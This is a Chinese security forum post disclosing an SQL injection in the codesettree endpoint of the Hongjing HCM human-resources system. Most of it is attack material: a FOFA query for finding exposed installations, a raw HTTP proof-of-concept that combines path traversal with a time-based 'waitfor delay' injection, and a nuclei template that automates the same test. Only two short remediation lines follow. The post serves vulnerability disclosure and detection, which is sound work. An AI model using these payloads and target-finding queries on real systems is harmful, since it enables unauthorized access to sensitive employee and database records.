宏景HCM-codesettree接口存在SQL注入漏洞

我是大白   ·   发表于 2024-03-14 16:50:45   ·   漏洞文章

宏景HCM-codesettree接口存在SQL注入漏洞

漏洞描述

宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在于宏景EHR人力资源管理系统的 codesettree接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。

产品界面

fofa语法

app="HJSOFT-HCM" || body="宏景" || body="hj-hy-all-one-logo" || body="/general/sys/hjaxmanage.js"

POC

  1. GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:7'--+&parentid=-1&fromflag=" HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
  4. Accept: */*
  5. Accept-Encoding: gzip, deflate
  6. Connection: close

nuclei验证

  1. id: hongjing-hcm-codesettree-sql
  2. info:
  3. name: 宏景ehr-hcm-codesettree-sql注入
  4. author: nobody
  5. severity: high
  6. description: |
  7. 宏景EHR人力资源管理系统codesettree接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
  8. impact: |
  9. 攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作
  10. remediation: |
  11. 升级版本,打补丁
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: app="HJSOFT-HCM" || body="宏景" || body="/general/sys/hjaxmanage.js"
  16. tags: hongjing-HCM,sql
  17. requests:
  18. - raw:
  19. - |
  20. GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:6'--+&parentid=-1&fromflag=" HTTP/1.1
  21. Host: {{Hostname}}
  22. User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
  23. Accept: */*
  24. Accept-Encoding: gzip, deflate
  25. Connection: close
  26. matchers:
  27. - type: dsl
  28. condition: and
  29. dsl:
  30. - "duration>=6"
  31. - status_code==200 && contains_all(body,"?xml")

修复建议

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问

打赏我,让我更有动力~

0 条回复   |  直到 8个月前 | 425 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.